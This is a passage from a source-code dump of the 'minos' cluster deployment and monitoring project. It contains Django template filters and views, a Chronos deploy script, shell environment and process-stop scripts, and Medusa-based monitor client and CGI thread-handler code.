"path": "/owl/monitor/templatetags/extended_filter.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# extended filter for django template\n\nfrom django import template\nimport utils.quota_util\n\nregister = template.Library()\n\n# generate param for group\[email protected](name='param_group')\ndef param_group(graph_config) :\n return '|'.join([group for group, key in graph_config])\n\n# generate param for key in graph\[email protected](name='param_key')\ndef param_key(graph_config):\n return '|'.join(['-'.join((group,key)) for group, key, unit in graph_config])\n\n# generate param for multikey in view\[email protected](name='param_multikey_for_view')\ndef param_multikey_for_view(view_config):\n return '|'.join([param_key(graph_config) for graph_config in view_config])\n\n# generate param for multikey in view\[email protected](name='param_height')\ndef param_height(view_config):\n graph_per_row = 3\n height_per_row = 295\n return (len(view_config) + (graph_per_row - 1)) / graph_per_row * height_per_row\n\n# generate picture width\[email protected](name='pic_width')\ndef pic_width(span):\n return span * 100\n\n# generate picture height\[email protected](name='pic_heigth')\ndef pic_heigth(metrics):\n return len(metrics) * 10 + 450\n\n# format big number\[email protected](name='format_bigint')\ndef format_bigint(value):\n try:\n value = int(value)\n except (TypeError, ValueError):\n return value\n\n if value < 1024*1024:\n return value\n\n K = 1024\n formaters = (\n (2, '%.2fM'),\n (3, '%.2fG'),\n (4, '%.2fT'),\n (5, '%.2fP'),\n )\n\n for exponent, formater in formaters:\n larger_num = K ** exponent\n if value < larger_num * K:\n return formater % (value/float(larger_num))\n\n# is space quota healthy\[email protected](name='is_space_quota_healthy')\ndef is_space_quota_healthy(total, used):\n return utils.quota_util.is_space_quota_healthy(total, used)\n\n# is name quota healthy\[email protected](name='is_name_quota_healthy')\ndef is_name_quota_healthy(total, used):\n return utils.quota_util.is_name_quota_healthy(total, used)\n"
},
{
"alpha_fraction": 0.4683544337749481,
"alphanum_fraction": 0.5189873576164246,
"avg_line_length": 8.875,
"blob_id": "439ab09e7e78c278c08c498104cfb86d9f5cda33",
"content_id": "3c0a5fe9556800a13306d74fd93cc01c2cd7c9c6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 79,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 8,
"path": "/build/bin/stop_process.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nif [ $# -lt 1 ]; then\n echo \"usage: $0 PID\"\n exit 1\nfi\n\nkill $1\n"
},
{
"alpha_fraction": 0.5314842462539673,
"alphanum_fraction": 0.5472263693809509,
"avg_line_length": 24.653846740722656,
"blob_id": "edb7833556fd1175571c7478438d9fa71ad99beb",
"content_id": "dc8f54bb72cf9421a0a37c6e44900d31fcf1a827",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1334,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 52,
"path": "/supervisor/supervisor/medusa/monitor_client_win32.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\n# monitor client, win32 version\n\n# since we can't do select() on stdin/stdout, we simply\n# use threads and blocking sockets. <sigh>\n\nimport socket\nimport string\nimport sys\nimport thread\nimport md5\n\ndef hex_digest (s):\n m = md5.md5()\n m.update (s)\n return string.join (\n map (lambda x: hex (ord (x))[2:], map (None, m.digest())),\n '',\n )\n\ndef reader (lock, sock, password):\n # first grab the timestamp\n ts = sock.recv (1024)[:-2]\n sock.send (hex_digest (ts+password) + '\\r\\n')\n while 1:\n d = sock.recv (1024)\n if not d:\n lock.release()\n print 'Connection closed. Hit <return> to exit'\n thread.exit()\n sys.stdout.write (d)\n sys.stdout.flush()\n\ndef writer (lock, sock, barrel=\"just kidding\"):\n while lock.locked():\n sock.send (\n sys.stdin.readline()[:-1] + '\\r\\n'\n )\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n print 'Usage: %s host port'\n sys.exit(0)\n print 'Enter Password: ',\n p = raw_input()\n s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)\n s.connect ((sys.argv[1], string.atoi(sys.argv[2])))\n l = thread.allocate_lock()\n l.acquire()\n thread.start_new_thread (reader, (l, s, p))\n writer (l, s)\n"
},
{
"alpha_fraction": 0.6983630657196045,
"alphanum_fraction": 0.699822723865509,
"avg_line_length": 41.81696319580078,
"blob_id": "016e8a29d09cf1b385e94d5c57133e241d057339",
"content_id": "81cb6033fbfa1fed01fc08933bff7556faa9bae0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9591,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 224,
"path": "/client/deploy_chronos.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport argparse\nimport os\nimport service_config\nimport subprocess\nimport sys\nimport urlparse\n\nimport deploy_utils\n\nfrom log import Log\n\nALL_JOBS = [\"chronos\"]\n\ndef _get_chronos_service_config(args):\n args.chronos_config = deploy_utils.get_service_config(args)\n\ndef generate_zk_jaas_config(args):\n if not deploy_utils.is_security_enabled(args):\n return \"\"\n\n config_dict = args.chronos_config.configuration.generated_files[\"jaas.conf\"]\n\n for key, value in config_dict.items()[1:]:\n if value != \"true\" and value != \"false\" and value.find(\"\\\"\") == -1:\n config_dict[key] = \"\\\"\" + value + \"\\\"\"\n\n header_line = config_dict[\"headerLine\"]\n return \"Client {\\n %s\\n%s;\\n};\" % (header_line,\n \"\\n\".join([\" %s=%s\" % (key, value)\n for (key, value) in config_dict.iteritems() if key != config_dict.keys()[0]]))\n\ndef generate_configs(args, job_name, host_id, instance_id):\n chronos_cfg_dict = args.chronos_config.configuration.generated_files[\"chronos.cfg\"]\n hosts = args.chronos_config.jobs[job_name].hosts\n chronos_cfg = deploy_utils.generate_properties_file(args, chronos_cfg_dict)\n\n config_files = {\n \"chronos.cfg\": chronos_cfg,\n \"jaas.conf\" : generate_zk_jaas_config(args),\n }\n config_files.update(args.chronos_config.configuration.raw_files) # what's this?\n\n return config_files\n\ndef generate_run_scripts_params(args, host, job_name, host_id, instance_id):\n job = args.chronos_config.jobs[job_name]\n\n supervisor_client = deploy_utils.get_supervisor_client(host,\n \"chronos\", args.chronos_config.cluster.name, job_name, instance_id=instance_id)\n\n artifact_and_version = \"chronos-\" + args.chronos_config.cluster.version\n\n jar_dirs = \"$package_dir/lib/*\"\n log_level = deploy_utils.get_service_log_level(args, args.chronos_config)\n\n params = job.get_arguments(args, args.chronos_config.cluster, args.chronos_config.jobs,\n args.chronos_config.arguments_dict, job_name, host_id, instance_id)\n\n script_dict = {\n \"artifact\": artifact_and_version,\n \"job_name\": job_name,\n \"jar_dirs\": jar_dirs,\n \"run_dir\": supervisor_client.get_run_dir(),\n \"params\": params,\n }\n\n return script_dict\n\ndef generate_start_script(args, host, job_name, host_id, instance_id):\n script_params = generate_run_scripts_params(args, host, job_name, host_id, instance_id)\n return deploy_utils.create_run_script(\n \"%s/start.sh.tmpl\" % deploy_utils.get_template_dir(),\n script_params)\n\ndef install(args):\n _get_chronos_service_config(args)\n deploy_utils.install_service(args, \"chronos\", args.chronos_config, \"chronos\")\n\ndef cleanup(args):\n _get_chronos_service_config(args)\n\n cleanup_token = deploy_utils.confirm_cleanup(args,\n \"chronos\", args.chronos_config)\n for job_name in args.job or ALL_JOBS:\n hosts = args.chronos_config.jobs[job_name].hosts\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n deploy_utils.cleanup_job(\"chronos\", args.chronos_config,\n hosts[host_id].ip, job_name, instance_id, cleanup_token)\n\ndef bootstrap_job(args, host, job_name, host_id, instance_id, cleanup_token):\n # parse the service_config according to the instance_id\n args.chronos_config.parse_generated_config_files(args, job_name, host_id, instance_id)\n deploy_utils.bootstrap_job(args, \"chronos\", \"chronos\",\n args.chronos_config, host, job_name, instance_id, cleanup_token, '0')\n start_job(args, host, job_name, host_id, instance_id)\n\ndef bootstrap(args):\n _get_chronos_service_config(args)\n cleanup_token = deploy_utils.confirm_bootstrap(\"chronos\", args.chronos_config)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.chronos_config.jobs[job_name].hosts\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n bootstrap_job(args, hosts[host_id].ip, job_name, host_id, instance_id, cleanup_token)\n\ndef start_job(args, host, job_name, host_id, instance_id):\n # parse the service_config according to the instance_id\n args.chronos_config.parse_generated_config_files(args, job_name, host_id, instance_id)\n\n config_files = generate_configs(args, job_name, host_id, instance_id)\n start_script = generate_start_script(args, host, job_name, host_id, instance_id)\n http_url = deploy_utils.get_http_service_uri(host,\n args.chronos_config.jobs[job_name].base_port, instance_id)\n deploy_utils.start_job(args, \"chronos\", \"chronos\", args.chronos_config,\n host, job_name, instance_id, start_script, http_url, **config_files)\n\ndef start(args):\n if not args.skip_confirm:\n deploy_utils.confirm_start(args)\n _get_chronos_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.chronos_config.jobs[job_name].hosts\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n start_job(args, hosts[host_id].ip, job_name, host_id, instance_id)\n\ndef stop_job(args, host, job_name, instance_id):\n deploy_utils.stop_job(\"chronos\", args.chronos_config, host, job_name, instance_id)\n\ndef stop(args):\n if not args.skip_confirm:\n deploy_utils.confirm_stop(args)\n _get_chronos_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.chronos_config.jobs[job_name].hosts\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n stop_job(args, hosts[host_id].ip, job_name, instance_id)\n\ndef restart(args):\n if not args.skip_confirm:\n deploy_utils.confirm_restart(args)\n _get_chronos_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.chronos_config.jobs[job_name].hosts\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n stop_job(args, hosts[host_id].ip, job_name, instance_id)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.chronos_config.jobs[job_name].hosts\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n deploy_utils.wait_for_job_stopping(\"chronos\",\n args.chronos_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n start_job(args, hosts[host_id].ip, job_name, host_id, instance_id)\n\ndef show(args):\n _get_chronos_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.chronos_config.jobs[job_name].hosts\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.keys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n deploy_utils.show_job(\"chronos\", args.chronos_config,\n hosts[host_id].ip, job_name, instance_id)\n\ndef run_shell(args):\n Log.print_critical(\"'shell' command is not supported!\")\n\ndef pack(args):\n Log.print_critical(\"'pack' command is not supported!\")\n\ndef rolling_update(args):\n if not args.job:\n Log.print_critical(\"You must specify the job name to do rolling update\")\n\n _get_chronos_service_config(args)\n job_name = args.job[0]\n\n if not args.skip_confirm:\n deploy_utils.confirm_action(args, \"rolling_update\")\n\n Log.print_info(\"Rolling updating %s\" % job_name)\n hosts = args.chronos_config.jobs[job_name].hosts\n wait_time = 0\n\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.iterkeys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n deploy_utils.confirm_rolling_update(host_id, instance_id, wait_time)\n stop_job(args, hosts[host_id].ip, job_name, instance_id)\n deploy_utils.wait_for_job_stopping(\"chronos\",\n args.chronos_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n start_job(args, hosts[host_id].ip, job_name, host_id, instance_id)\n deploy_utils.wait_for_job_starting(\"chronos\",\n args.chronos_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n wait_time = args.time_interval\n Log.print_success(\"Rolling updating %s success\" % job_name)\n\nif __name__ == '__main__':\n test()\n"
},
{
"alpha_fraction": 0.7142857313156128,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 24.66666603088379,
"blob_id": "703a4483f56505d97f06cf6a59a6ab701d056403",
"content_id": "715d229342c1f19c36c5459c49906752072316c6",
"detected_licenses": [
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 154,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 6,
"path": "/supervisor/supervisor/confecho.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import pkg_resources\nimport sys\n\ndef main(out=sys.stdout):\n config = pkg_resources.resource_string(__name__, 'skel/sample.conf')\n out.write(config)\n"
},
{
"alpha_fraction": 0.8180661797523499,
"alphanum_fraction": 0.8180661797523499,
"avg_line_length": 44.346153259277344,
"blob_id": "4050db52a504698761e9abae885e419338043f5b",
"content_id": "5ac62185540bd98b3ec16958a9b1e5fb216c77ba",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2358,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 52,
"path": "/build/minos_env.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# minos-env.sh\nCUR_DIR=\"$(dirname $(dirname $BASH_SOURCE))\"\ncd $CUR_DIR\nexport MINOS_ROOT=`pwd`\n\nexport CLIENT_ROOT=$MINOS_ROOT/client\nexport TANK_ROOT=$MINOS_ROOT/tank\nexport SUPERVISOR_ROOT=$MINOS_ROOT/supervisor\nexport OWL_ROOT=$MINOS_ROOT/owl\nexport BUILD_ROOT=$MINOS_ROOT/build\nexport OPENTSDB_COLLECTOR_ROOT=$MINOS_ROOT/opentsdb\n\nexport CLIENT_DEPLOY_ENTRY=$CLIENT_ROOT/deploy.py\nexport TANK_PID_FILE=$TANK_ROOT/tank.pid\nexport SUPERVISOR_PID_FILE=$SUPERVISOR_ROOT/supervisord.pid\nexport OWL_COLLECTOR_PID_FILE=$OWL_ROOT/owl_collector.pid\nexport OWL_MONITOR_PID_FILE=$OWL_ROOT/owl_monitor.pid\nexport QUOTA_UPDATER_PID_FILE=$OWL_ROOT/quota_updater.pid\n\nexport BUILD_BIN_ROOT=$BUILD_ROOT/bin\nexport BUILD_DOWNLOAD_ROOT=$BUILD_ROOT/download\nexport BUILD_TEMPLATE_ROOT=$BUILD_ROOT/template\nexport BUILD_VIRTUALENV_ENTRY=$BUILD_ROOT/build_virtualenv.sh\nexport BUILD_COMPONENTS_ENTRY=$BUILD_ROOT/build.py\nexport BUILD_CLIENT_ENTRY=$BUILD_ROOT/build_client.py\nexport OPENTSDB_ROOT=$BUILD_DOWNLOAD_ROOT/opentsdb\nexport OPENTSDB_BIN_PATH=$OPENTSDB_ROOT/build/tsdb\nexport OPENTSDB_PID_FILE=$OPENTSDB_ROOT/opentsdb.pid\nexport OPENTSDB_COLLECTOR_PID_FILE=$OPENTSDB_COLLECTOR_ROOT/opentsdb_collector.pid\n\nexport HBASE_PID_FILE=/tmp/hbase-$USER-master.pid\nexport HBASE_CONFIG_TEMPLATE=$BUILD_TEMPLATE_ROOT/hbase-site.xml.tmpl\nexport STOP_PROCESS_SCRIPT=$BUILD_BIN_ROOT/stop_process.sh\nexport SUPERVISOR_CONFIG_TEMPLATE=$BUILD_TEMPLATE_ROOT/supervisord.conf.tmpl\nexport SUPERVISOR_CONFIG_FILE=$SUPERVISOR_ROOT/supervisord.conf\nexport OWL_SETTING_TEMPLATE=$BUILD_TEMPLATE_ROOT/settings.py.tmpl\nexport OWL_SETTING_FILE=$OWL_ROOT/owl/settings.py\nexport OWL_CONFIG_TEMPLATE=$BUILD_TEMPLATE_ROOT/owl_config.py.tmpl\nexport OPENTSDB_COLLECTOR_CONFIG_TEMPLATE=$BUILD_TEMPLATE_ROOT/metrics_collector_config.py.tmpl\n\nexport VIRTUAL_BOOTSTRAP_ROOT=$BUILD_ROOT/virtual_bootstrap\nexport VIRTUALENV_SUPPORT_ROOT=$VIRTUAL_BOOTSTRAP_ROOT/virtualenv_support\nexport BUILD_OFFLINE_REQUIREMENTS_FILE=$VIRTUALENV_SUPPORT_ROOT/requirements.txt\nexport VIRTUAL_BOOTSTRAP_ENTRY=$VIRTUAL_BOOTSTRAP_ROOT/virtual_bootstrap.py\n\nexport BUILD_ENV_ROOT=$BUILD_ROOT/env\nexport BUILD_ENV_BIN_ROOT=$BUILD_ENV_ROOT/bin\nexport ENV_PYTHON=$BUILD_ENV_BIN_ROOT/python\nexport ENV_PIP=$BUILD_ENV_BIN_ROOT/pip\nexport BUILD_INFO_FILE=$BUILD_ROOT/.build.info\n\nexport SCRIPT_UTILS=$BUILD_BIN_ROOT/script_utils.sh\n"
},
{
"alpha_fraction": 0.4922298491001129,
"alphanum_fraction": 0.49846404790878296,
"avg_line_length": 29.5745849609375,
"blob_id": "1c907e7c0fb326943536f16e4a1de0746be5d065",
"content_id": "844c5f7c0b0f2e64f2c3737b656e1cb83957920d",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11068,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 362,
"path": "/supervisor/supervisor/medusa/thread/thread_handler.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\nimport re\nimport string\nimport StringIO\nimport sys\n\nimport os\nimport sys\nimport time\n\nimport select_trigger\nfrom supervisor.medusa import counter\nfrom supervisor.medusa import producers\n\nfrom supervisor.medusa.default_handler import unquote, get_header\n\nimport threading\n\nclass request_queue:\n\n def __init__ (self):\n self.mon = threading.RLock()\n self.cv = threading.Condition (self.mon)\n self.queue = []\n\n def put (self, item):\n self.cv.acquire()\n self.queue.append(item)\n self.cv.notify()\n self.cv.release()\n\n def get(self):\n self.cv.acquire()\n while not self.queue:\n self.cv.wait()\n result = self.queue.pop(0)\n self.cv.release()\n return result\n\nheader2env= {\n 'Content-Length' : 'CONTENT_LENGTH',\n 'Content-Type' : 'CONTENT_TYPE',\n 'Referer' : 'HTTP_REFERER',\n 'User-Agent' : 'HTTP_USER_AGENT',\n 'Accept' : 'HTTP_ACCEPT',\n 'Accept-Charset' : 'HTTP_ACCEPT_CHARSET',\n 'Accept-Language' : 'HTTP_ACCEPT_LANGUAGE',\n 'Host' : 'HTTP_HOST',\n 'Connection' : 'CONNECTION_TYPE',\n 'Authorization' : 'HTTP_AUTHORIZATION',\n 'Cookie' : 'HTTP_COOKIE',\n }\n\n# convert keys to lower case for case-insensitive matching\nfor (key,value) in header2env.items():\n del header2env[key]\n key=string.lower(key)\n header2env[key]=value\n\nclass thread_output_file (select_trigger.trigger_file):\n\n def close (self):\n self.trigger_close()\n\nclass script_handler:\n\n def __init__ (self, queue, document_root=\"\"):\n self.modules = {}\n self.document_root = document_root\n self.queue = queue\n\n def add_module (self, module, *names):\n if not names:\n names = [\"/%s\" % module.__name__]\n for name in names:\n self.modules['/'+name] = module\n\n def match (self, request):\n uri = request.uri\n\n i = string.find(uri, \"/\", 1)\n if i != -1:\n uri = uri[:i]\n\n i = string.find(uri, \"?\", 1)\n if i != -1:\n uri = uri[:i]\n\n if self.modules.has_key (uri):\n request.module = self.modules[uri]\n return 1\n else:\n return 0\n\n def handle_request (self, request):\n\n [path, params, query, fragment] = request.split_uri()\n\n while path and path[0] == '/':\n path = path[1:]\n\n if '%' in path:\n path = unquote (path)\n\n env = {}\n\n env['REQUEST_URI'] = \"/\" + path\n env['REQUEST_METHOD'] = string.upper(request.command)\n env['SERVER_PORT'] = str(request.channel.server.port)\n env['SERVER_NAME'] = request.channel.server.server_name\n env['SERVER_SOFTWARE'] = request['Server']\n env['DOCUMENT_ROOT'] = self.document_root\n\n parts = string.split(path, \"/\")\n\n # are script_name and path_info ok?\n\n env['SCRIPT_NAME'] = \"/\" + parts[0]\n\n if query and query[0] == \"?\":\n query = query[1:]\n\n env['QUERY_STRING'] = query\n\n try:\n path_info = \"/\" + string.join(parts[1:], \"/\")\n except:\n path_info = ''\n\n env['PATH_INFO'] = path_info\n env['GATEWAY_INTERFACE']='CGI/1.1' # what should this really be?\n env['REMOTE_ADDR'] =request.channel.addr[0]\n env['REMOTE_HOST'] =request.channel.addr[0] # TODO: connect to resolver\n\n for header in request.header:\n [key,value]=string.split(header,\": \",1)\n key=string.lower(key)\n\n if header2env.has_key(key):\n if header2env[key]:\n env[header2env[key]]=value\n else:\n key = 'HTTP_' + string.upper(\n string.join(\n string.split (key,\"-\"),\n \"_\"\n )\n )\n env[key]=value\n\n ## remove empty environment variables\n for key in env.keys():\n if env[key]==\"\" or env[key]==None:\n del env[key]\n\n try:\n httphost = env['HTTP_HOST']\n parts = string.split(httphost,\":\")\n env['HTTP_HOST'] = parts[0]\n except KeyError:\n pass\n\n if request.command in ('put', 'post'):\n # PUT data requires a correct Content-Length: header\n # (though I bet with http/1.1 we can expect chunked encoding)\n request.collector = collector (self, request, env)\n request.channel.set_terminator (None)\n else:\n sin = StringIO.StringIO ('')\n self.continue_request (sin, request, env)\n\n def continue_request (self, stdin, request, env):\n stdout = header_scanning_file (\n request,\n thread_output_file (request.channel)\n )\n self.queue.put (\n (request.module.main, (env, stdin, stdout))\n )\n\nHEADER_LINE = re.compile ('([A-Za-z0-9-]+): ([^\\r\\n]+)')\n\n# A file wrapper that handles the CGI 'Status:' header hack\n# by scanning the output.\n\nclass header_scanning_file:\n\n def __init__ (self, request, file):\n self.buffer = ''\n self.request = request\n self.file = file\n self.got_header = 0\n self.bytes_out = counter.counter()\n\n def write (self, data):\n if self.got_header:\n self._write (data)\n else:\n # CGI scripts may optionally provide extra headers.\n #\n # If they do not, then the output is assumed to be\n # text/html, with an HTTP reply code of '200 OK'.\n #\n # If they do, we need to scan those headers for one in\n # particular: the 'Status:' header, which will tell us\n # to use a different HTTP reply code [like '302 Moved']\n #\n self.buffer = self.buffer + data\n lines = string.split (self.buffer, '\\n')\n # ignore the last piece, it is either empty, or a partial line\n lines = lines[:-1]\n # look for something un-header-like\n for i in range(len(lines)):\n li = lines[i]\n if (not li) or (HEADER_LINE.match (li) is None):\n # this is either the header separator, or it\n # is not a header line.\n self.got_header = 1\n h = self.build_header (lines[:i])\n self._write (h)\n # rejoin the rest of the data\n d = string.join (lines[i:], '\\n')\n self._write (d)\n self.buffer = ''\n break\n\n def build_header (self, lines):\n status = '200 OK'\n saw_content_type = 0\n hl = HEADER_LINE\n for line in lines:\n mo = hl.match (line)\n if mo is not None:\n h = string.lower (mo.group(1))\n if h == 'status':\n status = mo.group(2)\n elif h == 'content-type':\n saw_content_type = 1\n lines.insert (0, 'HTTP/1.0 %s' % status)\n lines.append ('Server: ' + self.request['Server'])\n lines.append ('Date: ' + self.request['Date'])\n if not saw_content_type:\n lines.append ('Content-Type: text/html')\n lines.append ('Connection: close')\n return string.join (lines, '\\r\\n')+'\\r\\n\\r\\n'\n\n def _write (self, data):\n self.bytes_out.increment (len(data))\n self.file.write (data)\n\n def writelines(self, list):\n self.write (string.join (list, ''))\n\n def flush(self):\n pass\n\n def close (self):\n if not self.got_header:\n # managed to slip through our header detectors\n self._write (self.build_header (['Status: 502', 'Content-Type: text/html']))\n self._write (\n '<html><h1>Server Error</h1>\\r\\n'\n '<b>Bad Gateway:</b> No Header from CGI Script\\r\\n'\n '<pre>Data: %s</pre>'\n '</html>\\r\\n' % (repr(self.buffer))\n )\n self.request.log (int(self.bytes_out.as_long()))\n self.file.close()\n self.request.channel.current_request = None\n\n\nclass collector:\n\n \"gathers input for PUT requests\"\n\n def __init__ (self, handler, request, env):\n self.handler = handler\n self.env = env\n self.request = request\n self.data = StringIO.StringIO()\n\n # make sure there's a content-length header\n self.cl = request.get_header ('content-length')\n\n if not self.cl:\n request.error (411)\n return\n else:\n self.cl = string.atoi(self.cl)\n\n def collect_incoming_data (self, data):\n self.data.write (data)\n if self.data.tell() >= self.cl:\n self.data.seek(0)\n\n h=self.handler\n r=self.request\n\n # set the terminator back to the default\n self.request.channel.set_terminator ('\\r\\n\\r\\n')\n del self.handler\n del self.request\n\n h.continue_request (self.data, r, self.env)\n\n\nclass request_loop_thread (threading.Thread):\n\n def __init__ (self, queue):\n threading.Thread.__init__ (self)\n self.setDaemon(1)\n self.queue = queue\n\n def run (self):\n while 1:\n function, (env, stdin, stdout) = self.queue.get()\n function (env, stdin, stdout)\n stdout.close()\n\n# ===========================================================================\n# Testing\n# ===========================================================================\n\nif __name__ == '__main__':\n\n import sys\n\n if len(sys.argv) < 2:\n print 'Usage: %s <worker_threads>' % sys.argv[0]\n else:\n nthreads = string.atoi (sys.argv[1])\n\n import asyncore_25 as asyncore\n from supervisor.medusa import http_server\n # create a generic web server\n hs = http_server.http_server ('', 7080)\n\n # create a request queue\n q = request_queue()\n\n # create a script handler\n sh = script_handler (q)\n\n # install the script handler on the web server\n hs.install_handler (sh)\n\n # get a couple of CGI modules\n import test_module\n import pi_module\n\n # install the module on the script handler\n sh.add_module (test_module, 'test')\n sh.add_module (pi_module, 'pi')\n\n # fire up the worker threads\n for i in range (nthreads):\n rt = request_loop_thread (q)\n rt.start()\n\n # start the main event loop\n asyncore.loop()\n"
},
{
"alpha_fraction": 0.657101035118103,
"alphanum_fraction": 0.6620790362358093,
"avg_line_length": 26.983606338500977,
"blob_id": "d0facf1dbaa47535d632e17e198047174a934098",
"content_id": "1cf088f6fc7a942e26d4d4668eb63b9d4c16d5d4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3415,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 122,
"path": "/tank/package_server/views.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# Create your views here.\nimport hashlib\nimport os\nimport time\n\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom package_server.forms import UploadFileForm\nfrom package_server.models import Package\nfrom tank.settings import STATIC_URL\n\nITEM_LIMITS = 20\n\n@csrf_exempt\ndef upload_package(request):\n if request.method == 'POST':\n form = UploadFileForm(request.POST, request.FILES)\n if form.is_valid():\n artifact = request.POST.get('artifact')\n revision_no = request.POST.get('revision')\n file_obj = request.FILES.get('file')\n\n error_message = str()\n if not artifact:\n error_message = 'Artifact should not be empty'\n elif not revision_no:\n error_message = 'Revison should not be empty'\n\n if error_message:\n return render_to_response('upload.html', {\n 'error_message': error_message,\n 'STATIC_URL': STATIC_URL.rstrip('/'),\n })\n else:\n package_name = os.path.basename(file_obj.name)\n checksum = generate_checksum(file_obj)\n time = generate_timestamp()\n file_obj.seek(0)\n package = Package(artifact=artifact, name=package_name,\n revision=revision_no, timestamp=time,\n checksum=checksum, file=file_obj)\n package.save()\n return render_to_response('upload.html', {\n 'upload_success': True,\n 'package': package,\n 'STATIC_URL': STATIC_URL.rstrip('/'),\n })\n else:\n form = UploadFileForm()\n\n return render_to_response('upload.html', {\n 'form': form,\n 'STATIC_URL': STATIC_URL.rstrip('/'),\n })\n\ndef list_packages(request, page_no = 1):\n package_list = Package.objects.order_by('id').reverse()\n has_package = (len(package_list) > 0)\n return render_to_response('package_list.html', {\n 'package_list': package_list,\n 'has_package': has_package,\n 'STATIC_URL': STATIC_URL.rstrip('/'),\n })\n\ndef check_package(request):\n artifact = request.GET.get('artifact')\n checksum = request.GET.get('checksum')\n\n package = get_package(artifact, checksum)\n if package:\n return HttpResponse(str(package))\n else:\n return HttpResponse('Package Not Found')\n\ndef get_latest_package_info(request):\n artifact = request.GET.get('artifact')\n package_name = request.GET.get('package_name')\n package = get_latest_package(artifact, package_name)\n if package:\n return HttpResponse(str(package))\n else:\n return HttpResponse('Package Not Found')\n\ndef generate_checksum(fp):\n sha1 = hashlib.sha1()\n while True:\n buffer = fp.read(4096)\n if not buffer: break\n sha1.update(buffer)\n return sha1.hexdigest()\n\ndef generate_timestamp():\n return time.strftime('%Y%m%d-%H%M%S')\n\ndef get_latest_package(artifact, package_name):\n if package_name:\n package_list = Package.objects.filter(\n artifact=artifact, 